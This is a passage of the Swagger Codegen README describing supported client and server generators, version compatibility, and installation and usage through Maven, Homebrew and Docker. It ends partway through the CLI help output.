For more information, please refer to the [Wiki page](https://github.com/swagger-api/swagger-codegen/wiki) and [FAQ](https://github.com/swagger-api/swagger-codegen/wiki/FAQ) :notebook_with_decorative_cover:\n\n:warning: If the OpenAPI/Swagger spec is obtained from an untrusted source, please make sure you've reviewed the spec before using Swagger Codegen to generate the API client, server stub or documentation as [code injection](https://en.wikipedia.org/wiki/Code_injection) may occur :warning:\n\n:rocket: ProductHunt: https://producthunt.com/posts/swagger-codegen :rocket:\n\n## Overview\nThis is the swagger codegen project, which allows generation of API client libraries (SDK generation), server stubs and documentation automatically given an [OpenAPI Spec](https://github.com/OAI/OpenAPI-Specification). Currently, the following languages/frameworks are supported:\n\n- **API clients**: **ActionScript**, **Apex**, **Bash**, **C#** (.net 2.0, 4.0 or later), **C++** (cpprest, Qt5, Tizen), **Clojure**, **Dart**, **Elixir**, **Eiffel**, **Go**, **Groovy**, **Haskell**, **Java** (Jersey1.x, Jersey2.x, OkHttp, Retrofit1.x, Retrofit2.x, Feign, RestTemplate, RESTEasy), **Kotlin**, **Node.js** (ES5, ES6, AngularJS with Google Closure Compiler annotations) **Objective-C**, **Perl**, **PHP**, **PowerShell**, **Python**, **Ruby**, **Scala**, **Swift** (2.x, 3.x, 4.x), **Typescript** (Angular1.x, Angular2.x, Fetch, jQuery, Node)\n- **Server stubs**: **C#** (ASP.NET Core, NancyFx), **C++** (Pistache, Restbed), **Erlang**, **Go**, **Haskell**, **Java** (MSF4J, Spring, Undertow, JAX-RS: CDI, CXF, Inflector, RestEasy, Play Framework), **PHP** (Lumen, Slim, Silex, [Symfony](https://symfony.com/), [Zend Expressive](https://github.com/zendframework/zend-expressive)), **Python** (Flask), **NodeJS**, **Ruby** (Sinatra, Rails5), **Scala** ([Finch](https://github.com/finagle/finch), Scalatra)\n- **API documentation generators**: **HTML**, **Confluence Wiki** \n- **Configuration files**: [**Apache2**](https://httpd.apache.org/)\n- **Others**: **JMeter**\n\nCheck out [OpenAPI-Spec](https://github.com/OAI/OpenAPI-Specification) for additional information about the OpenAPI project.\n\n# Table of contents\n\n - [Swagger Code Generator](#swagger-code-generator)\n - [Overview](#overview)\n - [Table of Contents](#table-of-contents)\n - Installation\n - [Compatibility](#compatibility)\n - [Prerequisites](#prerequisites)\n - [OS X Users](#os-x-users)\n - [Building](#building)\n - [Docker](#docker)\n - [Build and run](#build-and-run-using-docker)\n - [Run docker in Vagrant](#run-docker-in-vagrant)\n - [Public Docker image](#public-docker-image)\n - [Homebrew](#homebrew)\n - [Getting Started](#getting-started)\n - Generators\n - [To generate a sample client library](#to-generate-a-sample-client-library)\n - [Generating libraries from your server](#generating-libraries-from-your-server)\n - [Modifying the client library format](#modifying-the-client-library-format)\n - [Making your own codegen modules](#making-your-own-codegen-modules)\n - [Where is Javascript???](#where-is-javascript)\n - [Generating a client from local files](#generating-a-client-from-local-files)\n - [Customizing the generator](#customizing-the-generator)\n - [Validating your OpenAPI Spec](#validating-your-openapi-spec)\n - [Generating dynamic html api documentation](#generating-dynamic-html-api-documentation)\n - [Generating static html api documentation](#generating-static-html-api-documentation)\n - [To build a server stub](#to-build-a-server-stub)\n - [To build the codegen library](#to-build-the-codegen-library)\n - [Workflow Integration](#workflow-integration)\n - [Github Integration](#github-integration)\n - [Online Generators](#online-generators)\n - [Guidelines for Contribution](https://github.com/swagger-api/swagger-codegen/wiki/Guidelines-for-Contribution)\n - [Companies/Projects using Swagger Codegen](#companiesprojects-using-swagger-codegen)\n - [Presentations/Videos/Tutorials/Books](#presentationsvideostutorialsbooks)\n - [Swagger Codegen Core Team](#swagger-codegen-core-team)\n - [Swagger Codegen Evangelist](#swagger-codegen-evangelist)\n - [License](#license)\n\n\n## Compatibility\nThe OpenAPI Specification has undergone 3 revisions since initial creation in 2010. The swagger-codegen project has the following compatibilities with the OpenAPI Specification:\n\nSwagger Codegen Version | Release Date | OpenAPI Spec compatibility | Notes\n-------------------------- | ------------ | -------------------------- | -----\n3.0.0 (upcoming major release) [SNAPSHOT](https://oss.sonatype.org/content/repositories/snapshots/io/swagger/swagger-codegen-cli/3.0.0-SNAPSHOT/)| TBD | 1.0, 1.1, 1.2, 2.0, 3.0 | Major release with breaking changes\n2.3.0 (current master, upcoming minor release) [SNAPSHOT](https://oss.sonatype.org/content/repositories/snapshots/io/swagger/swagger-codegen-cli/2.3.0-SNAPSHOT/)| Jul/Aug 2017 | 1.0, 1.1, 1.2, 2.0 | Minor release with breaking changes\n[2.2.3](https://github.com/swagger-api/swagger-codegen/releases/tag/v2.2.3) (**current stable**) | 2017-07-15 | 1.0, 1.1, 1.2, 2.0 | [tag v2.2.3](https://github.com/swagger-api/swagger-codegen/tree/v2.2.3)\n[2.2.2](https://github.com/swagger-api/swagger-codegen/releases/tag/v2.2.2) | 2017-03-01 | 1.0, 1.1, 1.2, 2.0 | [tag v2.2.2](https://github.com/swagger-api/swagger-codegen/tree/v2.2.2)\n[2.2.1](https://github.com/swagger-api/swagger-codegen/releases/tag/v2.2.1) | 2016-08-07 | 1.0, 1.1, 1.2, 2.0 | [tag v2.2.1](https://github.com/swagger-api/swagger-codegen/tree/v2.2.1)\n[2.1.6](https://github.com/swagger-api/swagger-codegen/releases/tag/v2.1.6) | 2016-04-06 | 1.0, 1.1, 1.2, 2.0 | [tag v2.1.6](https://github.com/swagger-api/swagger-codegen/tree/v2.1.6)\n2.0.17 | 2014-08-22 | 1.1, 1.2 | [tag v2.0.17](https://github.com/swagger-api/swagger-codegen/tree/v2.0.17)\n1.0.4 | 2012-04-12 | 1.0, 1.1 | [tag v1.0.4](https://github.com/swagger-api/swagger-codegen/tree/swagger-codegen_2.9.1-1.1)\n\n\n### Prerequisites\nIf you're looking for the latest stable version, you can grab it directly from Maven.org (Java 7 runtime at a minimum):\n\n```sh\nwget http://central.maven.org/maven2/io/swagger/swagger-codegen-cli/2.2.3/swagger-codegen-cli-2.2.3.jar -O swagger-codegen-cli.jar\n\njava -jar swagger-codegen-cli.jar help\n```\n\nOn a mac, it's even easier with `brew`:\n```sh\nbrew install swagger-codegen\n```\n\nTo build from source, you need the following installed and available in your $PATH:\n\n* [Java 7 or 8](http://java.oracle.com)\n\n* [Apache maven 3.3.3 or greater](http://maven.apache.org/)\n\n#### OS X Users\nDon't forget to install Java 7 or 8. You probably have 1.6.\n\nExport JAVA_HOME in order to use the supported Java version:\n```sh\nexport JAVA_HOME=`/usr/libexec/java_home -v 1.8`\nexport PATH=${JAVA_HOME}/bin:$PATH\n```\n\n### Building\n\nAfter cloning the project, you can build it from source with this command:\n```sh\nmvn clean package\n```\n\n### Homebrew\n\nTo install, run `brew install swagger-codegen`\n\nHere is an example usage:\n```sh\nswagger-codegen generate -i http://petstore.swagger.io/v2/swagger.json -l ruby -o /tmp/test/\n```\n\n### Docker\n\n#### Development in docker\n\nYou can use `run-in-docker.sh` to do all development. This script maps your local repository to `/gen`\nin the docker container. It also maps `~/.m2/repository` to the appropriate container location.\n\nTo execute `mvn package`:\n\n```sh\ngit clone https://github.com/swagger-api/swagger-codegen\ncd swagger-codegen\n./run-in-docker.sh mvn package\n```\n\nBuild artifacts are now accessible in your working directory.\n\nOnce built, `run-in-docker.sh` will act as an executable for swagger-codegen-cli. To generate code, you'll need to output to a directory under `/gen` (e.g. `/gen/out`). For example:\n\n```sh\n./run-in-docker.sh help # Executes 'help' command for swagger-codegen-cli\n./run-in-docker.sh langs # Executes 'langs' command for swagger-codegen-cli\n./run-in-docker.sh /gen/bin/go-petstore.sh # Builds the Go client\n./run-in-docker.sh generate -i modules/swagger-codegen/src/test/resources/2_0/petstore.yaml \\\n -l go -o /gen/out/go-petstore -DpackageName=petstore # generates go client, outputs locally to ./out/go-petstore\n```\n\n#### Run Docker in Vagrant\nPrerequisite: install [Vagrant](https://www.vagrantup.com/downloads.html) and [VirtualBox](https://www.virtualbox.org/wiki/Downloads).\n ```sh\ngit clone http://github.com/swagger-api/swagger-codegen.git\ncd swagger-codegen\nvagrant up\nvagrant ssh\ncd /vagrant\n./run-in-docker.sh mvn package\n ```\n\n#### Public Pre-built Docker images\n\n - https://hub.docker.com/r/swaggerapi/swagger-generator/ (official web service)\n - https://hub.docker.com/r/swaggerapi/swagger-codegen-cli/ (official CLI)\n\n\n##### Swagger Generator Docker Image\n\nThe Swagger Generator image can act as a self-hosted web application and API for generating code. This container can be incorporated into a CI pipeline, and requires at least two HTTP requests and some docker orchestration to access generated code.\n\nExample usage (note this assumes `jq` is installed for command line processing of JSON):\n\n```sh\n# Start container and save the container id\nCID=$(docker run -d swaggerapi/swagger-generator)\n# allow for startup\nsleep 5\n# Get the IP of the running container\nGEN_IP=$(docker inspect --format '{{.NetworkSettings.IPAddress}}' $CID)\n# Execute an HTTP request and store the download link\nRESULT=$(curl -X POST --header 'Content-Type: application/json' --header 'Accept: application/json' -d '{\n \"swaggerUrl\": \"http://petstore.swagger.io/v2/swagger.json\"\n}' 'http://localhost:8188/api/gen/clients/javascript' | jq '.link' | tr -d '\"')\n# Download the generated zip and redirect to a file\ncurl $RESULT > result.zip\n# Shutdown the swagger generator image\ndocker stop $CID && docker rm $CID\n```\n\nIn the example above, `result.zip` will contain the generated client.\n\n##### Swagger Codegen CLI Docker Image\n\nThe Swagger Codegen image acts as a standalone executable. It can be used as an alternative to installing via homebrew, or for developers who are unable to install Java or upgrade the installed version.\n\nTo generate code with this image, you'll need to mount a local location as a volume.\n\nExample:\n\n```sh\ndocker run --rm -v ${PWD}:/local swaggerapi/swagger-codegen-cli generate \\\n -i http://petstore.swagger.io/v2/swagger.json \\\n -l go \\\n -o /local/out/go\n```\n\nThe generated code will be located under `./out/go` in the current directory.\n\n## Getting Started\n\nTo generate a PHP client for http://petstore.swagger.io/v2/swagger.json, please run the following\n```sh\ngit clone https://github.com/swagger-api/swagger-codegen\ncd swagger-codegen\nmvn clean package\njava -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \\\n -i http://petstore.swagger.io/v2/swagger.json \\\n -l php \\\n -o /var/tmp/php_api_client\n```\n(if you're on Windows, replace the last command with `java -jar modules\\swagger-codegen-cli\\target\\swagger-codegen-cli.jar generate -i http://petstore.swagger.io/v2/swagger.json -l php -o c:\\temp\\php_api_client`)\n\nYou can also download the JAR (latest release) directly from [maven.org](http://central.maven.org/maven2/io/swagger/swagger-codegen-cli/2.2.3/swagger-codegen-cli-2.2.3.jar)\n\nTo get a list of **general** options available, please run `java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar help generate`\n\nTo get a list of PHP specified options (which can be passed to the generator with a config file via the `-c` option), please run `java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar config-help -l php`\n\n## Generators\n\n### To generate a sample client library\nYou can build a client against the swagger sample [petstore](http://petstore.swagger.io) API as follows:\n\n```sh\n./bin/java-petstore.sh\n```\n\n(On Windows, run `.\\bin\\windows\\java-petstore.bat` instead)\n\nThis will run the generator with this command:\n\n```sh\njava -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \\\n -i http://petstore.swagger.io/v2/swagger.json \\\n -l java \\\n -o samples/client/petstore/java\n```\n\nwith a number of options. You can get the options with the `help generate` command (below only shows partal results):\n\n```\nNAME\n swagger-codegen-cli generate - Generate code with chosen lang\n\nSYNOPSIS\n swagger-codegen-cli generate\n [(-a | --auth )]\n [--additional-properties ...]\n [--api-package ] [--artifact-id ]\n [--artifact-version ]\n [(-c | --config )]\n [-D ...] [--git-repo-id ]\n [--git-user-id ] [--group-id ]\n [--http-user-agent ]\n (-i | --input-spec )\n [--ignore-file-override ]\n [--import-mappings ...]\n [--instantiation-types ...]\n [--invoker-package ]\n (-l | --lang )\n [--language-specific-primitives ...]\n [--library ] [--model-name-prefix ]\n [--model-name-suffix ]\n [--model-package ]\n [(-o | --output )]\n [--release-note ] [--remove-operation-id-prefix]\n [--reserved-words-mappings ...]\n [(-s | --skip-overwrite)]\n [(-t